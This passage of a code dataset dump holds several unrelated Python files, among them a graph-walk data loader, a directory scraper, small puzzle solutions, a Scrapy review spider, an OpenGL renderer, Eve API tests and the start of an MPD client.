desired set of nodes\n pos = []\n for node in np.where(nodes)[0]:\n pos.extend(np.where(self.node_seq == node)[0])\n\n pos = np.array(pos)\n if shuffle:\n indices = np.random.permutation(len(pos))\n pos = pos[indices]\n\n if batch_size == -1:\n batch_size = len(pos)\n\n tot = len(pos)//batch_size\n for i in range(0, len(pos), batch_size):\n x = self.all_walks[pos[i: i + batch_size]]\n x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)\n\n # get labels for valid data points, for others: select the 0th label\n x2 = [[self.label_cache.get(item, self.all_labels[0]) for item in row] for row in x]\n y = [self.all_labels[item] for item in x[-1]]\n\n # get features for all data points\n x = [[self.all_features[item] for item in row] for row in x]\n\n seq = self.node_seq[pos[i: i + batch_size]]\n\n yield (x, x2, seq, y, tot)\n\n @async_prefetch\n def next_batch_same(self, dataset, node_count=1):\n\n nodes = self.get_nodes(dataset)\n\n pos = []\n counts = []\n seq = []\n for node in np.where(nodes)[0]:\n temp = np.where(self.node_seq == node)[0]\n counts.append(len(temp))\n seq.append(node)\n pos.extend(temp)\n\n pos = np.array(pos)\n\n start = 0\n max_len = self.all_walks.shape[1]\n # Get a batch of all walks for 'node_count' number of node\n for idx in range(0, len(counts), node_count):\n #print(idx)\n stop = start + np.sum(counts[idx:idx+node_count]) #start + total number of walks to be consiudered this time\n x = self.all_walks[pos[start:stop]] #get the walks corresponding to respective positions\n\n temp = np.array(x)>0 #get locations of all zero inputs\n lengths = max_len - np.sum(temp, axis=1)\n\n x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)\n\n #\"\"\"\n #original\n # get labels for valid data points, for others: select the 0th label\n x2 = [[self.label_cache.get(item, self.all_labels[0]) for item in row] for row in x]\n y = [self.all_labels[item] for item in x[-1,:]] #Not useful, only presetn for sake of placeholder\n\n # get features for all data points\n x1 = [[self.all_features[item] for item in row] for row in x]\n #\"\"\"\n\n \"\"\"\n #Unique based\n u, inv = np.unique(x, return_inverse=True)\n u2, inv2 = np.unique(x[-1:], return_inverse=True)\n x2 = np.array([self.label_cache.get(item, self.all_labels[0]) for item in u])[inv]#.reshape(x.shape)\n x1 = np.array([self.all_features[item] for item in u])[inv]#.reshape(x.shape)\n y = np.array([self.all_labels[item] for item in u2])[inv2]\n \"\"\"\n\n \"\"\"\n # Vectorized\n # get labels for valid data points, for others: select the 0th label\n x2 = np.vectorize(self.label_cache.get)(x)\n x1 = np.vectorize(self.all_features.__getitem__)(x)\n y = np.vectorize(self.all_labels.__getitem__)(x[-1:])\n \"\"\"\n\n start = stop\n yield (x, x1, x2, seq[idx:idx+node_count], counts[idx:idx+node_count], y, lengths)\n\n\n def testPerformance(self):\n\n start = time.time()\n step =0\n for a,b,c,d,e,f,g in self.next_batch_same('all'):\n step += 1\n if step%500 == 0: print(step)\n\n print ('total time: ', time.time()-start)","sub_path":"Sample_Run/Seq_att/blogDWdata.py","file_name":"blogDWdata.py","file_ext":"py","file_size_in_byte":9690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"333736336","text":"from bs4 import BeautifulSoup\nfrom states import states\nimport requests\nimport time\nimport logging\nimport sys\nimport urlparse\n\nBASE_URL = \"https://therapists.psychologytoday.com\"\nRESULTS_URL = BASE_URL + \"/rms/prof_results.php\"\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36\"\nPAGE_TIMEOUT = 3\n\n\ndef main():\n \"\"\"\n\n :return:\n \"\"\"\n if args.debug:\n log.info(\"Started Psychology Today scraper in debug mode.\")\n params = {'s': 'N'}\n for state_abbr, state in states.iteritems():\n if args.debug:\n log.info(\"Scraping for state: %s\" % state)\n params['state'] = state_abbr\n parse_directory(params)\n\n\ndef parse_directory(params):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n has_more_pages = True\n index = 1\n while has_more_pages:\n if args.debug:\n log.info(\"rec_next: %d\" % index)\n params['rec_next'] = str(index)\n has_more_pages = parse_page(params)\n index += 20\n time.sleep(PAGE_TIMEOUT)\n\n\ndef parse_page(params):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n try:\n response = requests.get(RESULTS_URL, params=params, headers={'user-agent': USER_AGENT})\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n results = soup.find_all('a', attrs={\"class\": \"result-name\"})\n\n for link in results:\n name = link.span.string\n profid = get_profid(BASE_URL + link.get('href'))\n log.info(\"%s,%s\" % (name, profid))\n\n end_results = soup.find('div', attrs={\"class\": \"endresults-right\"})\n if end_results:\n contents = end_results.find_all('a')\n if len(contents) >= 1:\n return contents[-1].string == \"Next\"\n else:\n return False\n else:\n handle_county_state(soup, params)\n except requests.RequestException as e:\n log.debug(e)\n\n\ndef get_profid(link):\n \"\"\"\n\n :param link:\n :return:\n \"\"\"\n parsed_url = urlparse.urlparse(link)\n profid = urlparse.parse_qs(parsed_url.query)['profid'][0]\n return profid.encode('utf-8').strip()\n\n\ndef handle_county_state(soup, params):\n \"\"\"\n\n :param soup:\n :param params:\n :return:\n \"\"\"\n counties = soup.find('div', attrs={\"class\": \"col-xs-4\"})\n if counties:\n names = [county.string for county in counties.find_all('a')]\n for name in names:\n if args.debug:\n log.info(\"Handling county %s in state %s\" % (name, params['state']))\n params['county'] = name\n parse_directory(params)\n del params['county']\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Scrape https://psychologytoday.com')\n parser.add_argument('-d', '--debug', action='store_true', default=False)\n args = parser.parse_args()\n\n log = logging.getLogger(__name__)\n handler = logging.StreamHandler(sys.stdout)\n if args.debug:\n handler.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))\n else:\n handler.setFormatter(logging.Formatter('%(message)s'))\n handler.setLevel(logging.INFO)\n log.addHandler(handler)\n log.setLevel(logging.INFO)\n\n main()\n","sub_path":"scrape/psychology_today.py","file_name":"psychology_today.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623621387","text":"import json\nimport os\n\n__author__ = 'colinc'\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nDB_CONFIG = os.path.join(BASE_DIR, \".db_config\")\n\n\ndef data_dir():\n ddir = os.path.join(BASE_DIR, \"data\")\n if not os.path.exists(ddir):\n os.mkdir(ddir)\n return ddir\n\n\ndef get_db(key):\n return json.loads(open(DB_CONFIG, 'r').read()).get(key, \"\")\n","sub_path":"data_collector/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"215638958","text":"from random import randint\nc = 0\nprint('=-=-=-= Jogo do Par ou Ímpar =-=-=-=')\nwhile True:\n n = int(input('Forneça um número par ou ímpar:'))\n comp = randint(0,20)\n total = n + comp\n pi = ' '\n while pi not in 'PI':\n pi = str(input('Par ou Ímpar? [P/I]: ')).strip().upper()[0]\n print(f'Você jogou {n} e o computador {comp}. Total {total} .', end='')\n print('Deu Par. ' if total % 2 == 0 else 'Deu Ímpar. ', end='')\n if pi == 'P':\n if total % 2 == 0:\n c+=1\n print('Você venceu!')\n else:\n print('Você perdeu!')\n break\n if pi == 'I':\n if total % 2 == 1:\n c += 1\n print('Você venceu!')\n else:\n print('Você perdeu!')\n break\n print('Tente Novamente...')\nprint(f'Game Over: você venceu {c} vezes!')\n\n","sub_path":"68JogoParÍmpar.py","file_name":"68JogoParÍmpar.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188539968","text":"import pandas as pd\r\nimport math\r\n\r\nNUM_OF_FEATURE = 16\r\n\r\n#prepare Data\r\ndef EventToDF(Data:pd.DataFrame):\r\n event1 = [0 for i in range(NUM_OF_FEATURE)]\r\n event2 = [0 for i in range(NUM_OF_FEATURE)]\r\n for raw in Data.iterrows():\r\n if raw[1][\"side\"] == 1:\r\n event1[raw[1][\"event_type\"]] += 1\r\n if math.isnan(raw[1][\"event_type2\"]) == False:\r\n event1[int(raw[1][\"event_type2\"])] += 1\r\n else:\r\n event2[raw[1][\"event_type\"]] += 1\r\n if math.isnan(raw[1][\"event_type2\"]) == False:\r\n event2[int(raw[1][\"event_type2\"])] += 1\r\n #print(\"team 1 have event:\\n{}\\nTeam 2 have event:\\n{}\".format(event1,event2))\r\n return event1 + event2\r\n\r\ndef Makeheader(Data):\r\n header = []\r\n header0 = [item for item in Data.head(0)]\r\n header1 = [\"num of events type \" + str(i) + \" for size 1\" for i in range(NUM_OF_FEATURE)]\r\n header2 = [\"num of events type \" + str(i) + \" for size 2\" for i in range(NUM_OF_FEATURE)]\r\n header = header0 + header1 + header2\r\n return header\r\n\r\ndef main():\r\n # read ginf data\r\n Gintdata = pd.read_csv(\"ginf.csv\")\r\n # Making header\r\n header = Makeheader(Gintdata)\r\n # read event data\r\n Eventdata = pd.read_csv(\"events.csv\")\r\n #get the fauture from events\r\n raws = []\r\n #IDs = list(Gintdata[\"id_odsp\"])\r\n for raw in Gintdata.values:\r\n Eventdatatemp = Eventdata[(Eventdata[\"id_odsp\"] == raw[0])] # raw[0] == ID\r\n raws.append(list(raw)+EventToDF(Eventdatatemp))\r\n\r\n res = pd.DataFrame(data=raws, columns=header)\r\n res = res.drop(columns=[\"num of events type 0 for size 1\",\"num of events type 0 for size 2\", \"id_odsp\"])\r\n res.to_csv(\"final data.csv\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"PreData.py","file_name":"PreData.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"145203460","text":"import sys\nsys.path.append('.')\nimport logging\nfrom src.StdIOTestContainer import StdIOTestContainer as T\n\ndef solve():\n t = int(input().strip())\n for _ in range(t):\n nLine = int(input())\n\n sentenses = \"\"\n for _ in range(nLine):\n sentenses += input()\n \n totalSentense = sentenses.split(\"-\")\n totalSentense = \"\".join([\" \" if not sen else sen for sen in totalSentense])\n\n splited = totalSentense.split(\" \")\n T.info(splited)\n\n ret = list(map(len, splited))\n ret = [x for x in ret if x]\n T.info(ret)\n print(sum(ret) / len(ret))\n\nuser_input = '''\n4\n3\nhello-\nthere-\nworld\n4\na-\n-\n-\nb\n3\ni am ver-\ny sleepy arent-\n you \n1\njong-man rules\n'''\nexpected = '''\n15.000\n1.000\n3.500\n4.000\n'''\n\nT.runningTest(user_input, expected, solve)\n","sub_path":"src/algospot/WordLength.py","file_name":"WordLength.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"393618649","text":"# -*- coding: utf8 -*-\n\nimport re\nfrom datetime import datetime\n\nfrom urllib import unquote\nfrom scrapy import Request\n\nfrom alascrapy.items import ProductItem, ReviewItem\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.lib.generic import date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\n\n\nclass CarryologySpider(AlaSpider):\n name = 'carryology_com'\n allowed_domains = ['carryology.com']\n start_urls = ['https://www.carryology.com/category/luggage/']\n\n def __init__(self, *args, **kwargs):\n super(CarryologySpider, self).__init__(self, *args, **kwargs)\n self.stored_last_date = incremental_utils.get_latest_pro_review_date(\n self.mysql_manager, self.spider_conf[\"source_id\"])\n if not self.stored_last_date:\n self.stored_last_date = datetime(1970, 1, 1)\n\n def parse(self, response):\n\n review_divs_xpath = \"//div[@id='main']/ul\"\n review_divs = response.xpath(review_divs_xpath)\n\n for review_div in review_divs:\n date_xpath = './li//div[@class=\"meta\"]/text()[2]'\n dates = (review_div.xpath(date_xpath)).getall()\n for date in dates:\n \n r_date = str(date).lstrip(\", \")\n review_date = datetime.strptime(r_date, '%B %d, %Y')\n if review_date > self.stored_last_date:\n review_urls_xpath = \"./li/div/a/@href\"\n review_urls = (review_div.xpath(review_urls_xpath)).getall()\n for review in review_urls:\n yield Request(review, callback=self.parse_review)\n\n last_page=29\n for i in range(2, last_page+1):\n next_page_url = 'https://www.carryology.com/category/luggage/page/'+str(i)\n if next_page_url:\n last_date = self.extract(response.xpath('(//div[@id=\"main\"]/ul/li//div[@class=\"meta\"]/text()[2])[last()]'))\n r_date = str(last_date).lstrip(\", \")\n review_date = datetime.strptime(r_date, '%B %d, %Y')\n if review_date > self.stored_last_date:\n yield Request(next_page_url, callback=self.parse)\n\n def parse_review(self, response):\n\n review_xpaths = {\n \"TestTitle\": \"//meta[@property='og:title']/@content\",\n \"Author\": \"//div[@class='meta']/a/text()\",\n \"TestSummary\": \"//meta[@name='description']/@content\"\n }\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n product = ProductItem()\n if not review['TestSummary']:\n review['TestSummary'] = self.extract(response.xpath(\"//meta[@property='og:description']/@content\"))\n\n test_url = response.url\n internal_source_id = str(test_url).split('/')[4].rstrip('/')\n review['source_internal_id'] = internal_source_id\n product['source_internal_id'] = internal_source_id\n # product name\n title = (review['TestTitle']).encode('utf-8')\n if 'review' in title:\n product_name = title.replace(\" review\", \"\")\n elif 'Review' in title:\n product_name = title.replace(\" Review\", \"\")\n elif 'Video' in title:\n product_name = title.replace(\" Video\", \"\").split(\":\")[0]\n elif ':' in title:\n product_name = str(title).split(\":\")[0]\n else:\n product_name = title\n\n product_name = product_name.replace(\" - Carryology - Exploring better ways to carry\", \"\").replace(\" Video\", \"\").replace(\"Drive By\", \"\").replace(\":\", \"\").replace(\" |\", \"\").replace(\" Carryology\", \"\")\n\n review['ProductName'] = product_name\n product['ProductName'] = product_name\n\n source_test_rating = self.extract(response.xpath(\n \"//div[@class='bar']/span[@class='score']/text()\"))\n if source_test_rating:\n review['SourceTestRating'] = source_test_rating\n review['SourceTestScale'] = '10'\n review['TestUrl'] = test_url\n \n date_str = self.extract(response.xpath(\"//div[@class='meta']/text()[2]\"))\n date = str(date_str).lstrip(\", \")\n date_time = date_format(date, \"%B %d, %Y\")\n review['TestDateText'] = date_time\n review['DBaseCategoryName'] = 'PRO'\n\n product['TestUrl'] = test_url\n product['OriginalCategoryName'] = self.extract(response.xpath(\"//div[@class='breadcrumbs']//span/text()\"))\n product['PicURL'] = self.extract(response.xpath('//meta[@property=\"og:image\"]/@content'))\n yield review\n yield product","sub_path":"alascrapy/spiders/carryology_com.py","file_name":"carryology_com.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528382138","text":"from core import *\nfrom OpenGL.GL import *\nfrom lights import *\n\nclass Renderer(object):\n\n def __init__(self, viewWidth=512, viewHeight=512, clearColor=[0.75,0.75,0.75]):\n\n glEnable(GL_DEPTH_TEST)\n\n # enable transparency\n # glEnable(GL_TEXTURE_2D) # is this even useful?\n # glEnable(GL_ALPHA_TEST) # is this even useful?\n \n # use counterclockwise vertex order on triangles \n # (consistent with the \"right-hand rule\" for vector cross product)\n glFrontFace(GL_CCW)\n \n glEnable(GL_BLEND)\n \n # needed for antialiasing; also need to configure in window settings\n glEnable( GL_MULTISAMPLE ) \n\n # allow setting of point size from vertex shader; needed for point attenuation\n glEnable(GL_VERTEX_PROGRAM_POINT_SIZE) \n glEnable( GL_POINT_SPRITE )\n\n # set default screen dimensions\n self.setViewport(0,0, viewWidth,viewHeight)\n\n self.clearColor = clearColor\n \n self.shadowMapEnabled = False\n \n # define the location/size of the rendered output in the window\n def setViewport(self, left=0, bottom=0, width=512, height=512):\n self.left = left\n self.bottom = bottom\n self.screenWidth = width\n self.screenHeight = height\n \n def setViewportSize(self, width, height):\n # define the location/size of the rendered output in the window\n self.screenWidth = width\n self.screenHeight = height\n\n # color(rgba) used for clearing the screen background\n def setClearColor(self, red, green, blue):\n self.clearColor = [red,green,blue]\n \n def render(self, scene, camera, renderTarget=None, clearColor=True, clearDepth=True):\n\n # shadow rendering pass\n if self.shadowMapEnabled:\n \n # render objects in meshList from light's shadowCamera onto light's shadowMap\n \n # note: at present, only one shadow casting directional light is supported\n shadowCastLightList = scene.getObjectsByFilter( lambda x : isinstance(x, Light) and x.castShadow )\n \n # only store depth data for objects which are set to cast a shadow on other objects\n shadowCastMeshList = scene.getObjectsByFilter( lambda x : isinstance(x, Mesh) and x.castShadow )\n\n for light in shadowCastLightList:\n \n # set render target properties\n glBindFramebuffer(GL_FRAMEBUFFER, light.shadowRenderTarget.framebufferID)\n glViewport(0,0, light.shadowRenderTarget.width, light.shadowRenderTarget.height)\n \n glClearColor(1,0,1,1)\n glClear(GL_COLOR_BUFFER_BIT)\n glClear(GL_DEPTH_BUFFER_BIT)\n \n # activate shader\n shadowProgramID = light.shadowMaterial.shaderProgramID\n glUseProgram( shadowProgramID )\n \n glUniformMatrix4fv( glGetUniformLocation(shadowProgramID, \"projectionMatrix\"), \n 1, GL_TRUE, light.shadowCamera.getProjectionMatrix() )\n \n glUniformMatrix4fv(glGetUniformLocation(shadowProgramID, \"viewMatrix\"), \n 1, GL_TRUE, light.shadowCamera.getViewMatrix() )\n \n for mesh in shadowCastMeshList:\n mesh.render( shaderProgramID = shadowProgramID )\n \n \n # standard rendering pass\n \n glClearColor(self.clearColor[0], self.clearColor[1], self.clearColor[2], 1)\n \n # activate render target\n if (renderTarget == None):\n # set render target to window\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n glViewport(self.left, self.bottom, self.screenWidth, self.screenHeight)\n else:\n # set render target properties\n glBindFramebuffer(GL_FRAMEBUFFER, renderTarget.framebufferID)\n glViewport(0,0, renderTarget.width, renderTarget.height)\n\n # clear specified buffers\n if clearColor:\n glClear(GL_COLOR_BUFFER_BIT)\n if clearDepth:\n glClear(GL_DEPTH_BUFFER_BIT)\n \n \n meshList = scene.getObjectsByFilter( lambda x : isinstance(x, Mesh) )\n lightList = scene.getObjectsByFilter( lambda x : isinstance(x, Light) )\n \n for mesh in meshList: # scene.children:\n\n # activate correct shader program\n ID = mesh.material.shaderProgramID\n glUseProgram( ID ) \n \n # update projection and view matrix uniforms\n projectionMatrixVarID = glGetUniformLocation(ID, \"projectionMatrix\")\n if projectionMatrixVarID != -1:\n glUniformMatrix4fv(projectionMatrixVarID, 1, GL_TRUE, camera.getProjectionMatrix() )\n \n viewMatrixVarID = glGetUniformLocation(ID, \"viewMatrix\")\n if viewMatrixVarID != -1:\n glUniformMatrix4fv(viewMatrixVarID, 1, GL_TRUE, camera.getViewMatrix() )\n\n castShadowVarID = glGetUniformLocation(ID, \"castShadow\")\n if castShadowVarID != -1 and mesh.castShadow:\n glUniform1i( castShadowVarID, 1 )\n\n receiveShadowVarID = glGetUniformLocation(ID, \"receiveShadow\")\n if receiveShadowVarID != -1 and mesh.receiveShadow:\n glUniform1i( receiveShadowVarID, 1 )\n \n # update light data\n lightCount = len(lightList) \n glUniform1i( glGetUniformLocation(ID, \"lightCount\"), lightCount )\n\n # update data for all the lights\n lightIndex = 0\n for light in lightList:\n lightName = \"light\" + str(lightIndex)\n glUniform1i( glGetUniformLocation(ID, lightName+\".isAmbient\"), light.isAmbient )\n glUniform1i( glGetUniformLocation(ID, lightName+\".isDirectional\"), light.isDirectional )\n glUniform1i( glGetUniformLocation(ID, lightName+\".isPoint\"), light.isPoint )\n glUniform3f( glGetUniformLocation(ID, lightName+\".color\"), light.color[0], light.color[1], light.color[2] )\n glUniform1f( glGetUniformLocation(ID, lightName+\".strength\"), light.strength )\n \n position = light.transform.getPosition()\n glUniform3f( glGetUniformLocation(ID, lightName+\".position\"), position[0], position[1], position[2] )\n \n if light.isDirectional == 1:\n direction = light.getDirection()\n glUniform3f( glGetUniformLocation(ID, lightName+\".direction\"), direction[0], direction[1], direction[2] )\n \n # if castShadow, update variables containing shadow-related data\n # note: at present, only one shadow casting directional light is supported\n if light.castShadow:\n glUniformMatrix4fv( glGetUniformLocation(ID, \"shadowLightProjectionMatrix\"), 1, GL_TRUE, light.shadowCamera.getProjectionMatrix() )\n glUniformMatrix4fv( glGetUniformLocation(ID, \"shadowLightViewMatrix\"), 1, GL_TRUE, light.shadowCamera.getViewMatrix() )\n \n glUniform1f( glGetUniformLocation(ID, \"shadowStrength\"), light.shadowStrength )\n glUniform1f( glGetUniformLocation(ID, \"shadowBias\"), light.shadowBias )\n \n direction = light.getDirection()\n glUniform3f( glGetUniformLocation(ID, \"shadowLightDirection\"), direction[0], direction[1], direction[2] )\n \n # send shadow map texture data (slot 0)\n glUniform1i( glGetUniformLocation(ID, \"shadowMap\"), 0 )\n # activate texture slot\n glActiveTexture( GL_TEXTURE0 + 0 )\n # associate texture data reference to currently active texture slot\n glBindTexture( GL_TEXTURE_2D, light.shadowRenderTarget.textureID )\n \n lightIndex += 1\n \n # update model matrix, other uniforms, etc.\n # and then call the drawArrays function\n mesh.render( shaderProgramID = mesh.material.shaderProgramID )\n \n","sub_path":"three.py/core/Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"75338494","text":"from json import dumps\n\nimport os\nfrom flask_testing import TestCase\nfrom werkzeug.exceptions import InternalServerError\n\nfrom tests.eve_testing_tools import EveEndpointTestTools\n\n\nclass TestClientsEndpoint(TestCase, EveEndpointTestTools):\n\n def create_app(self):\n os.environ[\"STAGE\"] = \"PROJECTS_TESTING\"\n settings = \"tests.test_projects.projects_testing_settings\"\n os.environ[\"STAGE_SETTINGS\"] = settings\n try:\n EveEndpointTestTools.__init__(self, extra=[\"clients\"])\n except InternalServerError:\n pass\n\n return self.app\n\n def setUp(self):\n self.app = self.app.test_client()\n self.test_client = {\n \"name\": \"Test Client\",\n \"short\": \"TC1\",\n \"brands\": [\n {\n \"name\": \"Test Client1 - Brand 1\",\n \"short\": \"B11\"\n },\n {\n \"name\": \"Test Client1 - Brand 2\",\n \"short\": \"B12\"\n }\n ]\n }\n\n self.assignees = self.objId_to_list(self.insert_bulk_users())\n\n self.test_client[\"_id\"] = str(self.insert_endpoint_pilot(endpoint=\"clients\", data=self.test_client))\n\n self.test_project = {\n 'no': 1,\n 'name': \"Test Project\",\n 'client': {\n \"_id\": self.test_client[\"_id\"],\n \"name\": self.test_client[\"name\"],\n \"short\": self.test_client[\"short\"]\n },\n\n \"brand\": {\n \"name\": self.test_client[\"brands\"][0][\"name\"],\n \"short\": self.test_client[\"brands\"][0][\"short\"]\n },\n \"target_media\": \"CNM\",\n \"category\": \"AV\",\n \"format\": {\n \"code\": \"MP4H\",\n },\n \"owner\": {\n \"_id\": str(self.pilot_id)\n },\n \"assignees\": self.assignees,\n \"status\": \"Invoiced\",\n }\n\n def tearDown(self):\n self.clean_conf()\n self.clean_db()\n self.clean_dirs()\n\n def test_endpoint_get_projects_pass(self): # also tests root_dir_name hook\n r = self.app.get(\n self.api_url(),\n headers=self.token_header())\n data, code = self.parse_response(r)\n self.assertEqual(code, 200)\n\n def test_endpoint_insert_project_pass(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 201)\n self.assertIsNotNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n\n def test_endpoint_insert_fail_invalid_field(self):\n del self.test_project[\"target_media\"]\n self.test_project[\"invalid_field\"] = \"CNM\"\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertIsNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"][\"invalid_field\"], \"unknown field\")\n\n def test_insert_fail_invalid_value(self):\n self.test_project[\"status\"] = 1234\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertIsNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"][\"status\"], \"must be of string type\")\n\n def test_endpoint_protected_fail(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(token=\"invalid_token\"), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 401)\n self.assertIsNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n\n def test_endpoint_unique_name_fail(self):\n self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project)\n )\n duplicate_project = self.test_project.copy()\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(duplicate_project)\n )\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"], {'no': \"value '1' is not unique\"})\n\n def test_endpoint_delete_pass(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n _etag = data[\"_etag\"]\n r = self.app.delete(\n self.item_url(data[\"_id\"]),\n headers=self.token_header(item={\"If-Match\": _etag}))\n data, code = self.parse_response(r)\n self.assertEqual(code, 204)\n self.assertIsNone(self.get_db().find_one({\"no\": self.test_project[\"no\"]}))\n\n def test_endpoint_get_additional_lookup_pass(self):\n self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n r = self.app.get(\n self.item_url(str(self.test_project[\"no\"])),\n headers=self.token_header())\n data, code = self.parse_response(r)\n self.assertEqual(code, 200)\n self.assertEqual(data[\"no\"], 1)\n\n # TODO\n # def test_endpoint_fs_pass(self):\n # self.app.application.config[\"SUPPRESS_FS\"] = False\n # self.app.post(\n # self.api_url(),\n # headers=self.token_header(), data=dumps(self.test_client))\n # self.assertTrue(self.dir_tester(\n # self.app.application.config[\"clients\"][\"dirs\"],\n # os.path.join(\n # self.app.application.config[\"clients\"][\"storage\"][\"root\"],\n # fs_name_cleaner(self.test_client[\"name\"])\n # )\n # ))\n","sub_path":"tests/test_projects/test_projects.py","file_name":"test_projects.py","file_ext":"py","file_size_in_byte":6316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"110161390","text":"'''\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps. In how many \ndistinct ways can you climb to the top?\n\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\n\nExample 2:\n\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\nExample 3: \n\nn = 4\n1. 1 step + 1 step + 1 step + 1 step\n2. 1 step + 2 steps + 1 step\n3. 2 steps + 1 step + 1 step\n4. 2 steps + 2 steps\n\n'''\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n s = []\n # only way to initiaise an array in python\n for i in range(0,n+1):\n s.append(0)\n\n # preset the first two items\n s[0] = 1\n s[1] = 1\n\n for i in range(2,n+1):\n s[i] = s[i-1] + s[i-2]\n return s[n]\n\ns = Solution()\nprint(s.climbStairs(5))\n\n\n\n\n\n\n","sub_path":"leetcode/070_climbing_stairs/stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"557019428","text":"class KiwiJuiceEasy:\r\n def thePouring(self,capacities, bottles, fromId, toId):\r\n for i in range(len(fromId)):\r\n tmp = bottles[toId[i]] + bottles[fromId[i]] \r\n# second version's code\r\n bottles[toId[i]] = min(tmp,capacities[toId[i]])\r\n bottles[fromId[i]] = tmp - bottles[toId[i]]\r\n \r\n# this is first version's code\r\n# if capacities[toId[i]] >= tmp:\r\n# bottles[toId[i]] = tmp\r\n# bottles[fromId[i]] = 0\r\n# else:\r\n# bottles[toId[i]] = capacities[toId[i]]\r\n# bottles[fromId[i]] = tmp - capacities[toId[i]]\r\n \r\n remains = bottles \r\n print(remains)\r\n\r\n\r\nkiwi = KiwiJuiceEasy();\r\ncapacities = [700000,800000,900000,1000000]\r\nbottles = [478478,478478,478478,478478]\r\nfromId = [2,3,2,0,1];\r\ntoId = [0,1,1,3,2];\r\n\r\nkiwi.thePouring(capacities, bottles, fromId, toId)","sub_path":"KiwiJuiceEasy/KiwiJuiceEasy.py","file_name":"KiwiJuiceEasy.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"333220276","text":"#! /usr/bin/env python3\n\nfrom mpd import MPDClient, ConnectionError\nfrom mpd.base import CommandError\nimport threading\nimport queue\nimport time\nimport select\n\n\n\nclass mpd_jan:\n def __init__(self, host, port):\n self._host = host\n self._port = port\n self._watcher = MPDClient()\n self._sender = MPDClient()\n self._sender.watcher_player = self.player\n self._sender.watcher_options = self.player\n self._sender.watcher_playlist = self.get_playlist\n self._sender.watcher_stored_playlist = self.stored_playlist\n self._sender.watcher_update = self.watcher_update\n self._sender.watcher_database = self.watcher_database\n self._sender.watcher_sticker = self.watcher_sticker\n self._sender.watcher_mixer = self.watcher_mixer\n self.exit_sender, self.exit_watcher = False, False\n self.queue_sender = queue.Queue()\n self.queue_watcher = queue.Queue()\n self.queue_output = queue.Queue()\n self._playlist = []\n self.sema_playlist = threading.Semaphore()\n self._status = {}\n 